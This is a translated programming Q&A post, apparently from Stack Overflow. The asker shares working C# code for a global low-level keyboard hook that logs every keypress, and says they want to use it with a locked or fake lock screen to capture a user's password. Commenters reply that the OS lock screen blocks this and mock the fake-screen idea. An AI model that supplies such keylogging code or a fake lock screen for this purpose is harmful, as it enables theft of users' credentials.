【发布时间】:2014-02-22 19:42:02
【问题描述】:
我正在试验键盘事件以及你可以用它们做什么,我发现了很多教程和开源库来监听其他进程中的键盘事件。我想出了创建一个简单的“hack”来锁定计算机然后监听键盘事件的想法。我想我可以强制用户输入他们的密码来解锁他们的计算机,然后我会听取用户的输入,从而获得指定的密码。这是我在互联网上找到的用于监听全局键盘事件的简单示例代码:
using System;
using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
class InterceptKeys
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
public static void Main()
{
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
}
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
private delegate IntPtr LowLevelKeyboardProc(
int nCode, IntPtr wParam, IntPtr lParam);
private static IntPtr HookCallback(
int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
Console.WriteLine((Keys)vkCode);
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
}
这很安静,但是由于某种原因,在计算机锁定时收听键盘输入时似乎出现异常?我不确定为什么它不起作用,也许这是一个安全问题。无论如何,如果有人能做到这一点,那就太棒了。
【问题讨论】:
-
它是一个安全的东西。我怀疑有没有办法绕过它而不破解操作系统。
-
@RobertHarvey 感谢您非常的快速回答。但是,如果你运行另一个伪造的相同应用程序或应用程序的破解版本,然后让用户认为计算机被锁定,这是否可能实现?
-
给我一个信用卡号(以及背面的安全码),我会告诉你答案。
标签: c# keyboard globalevent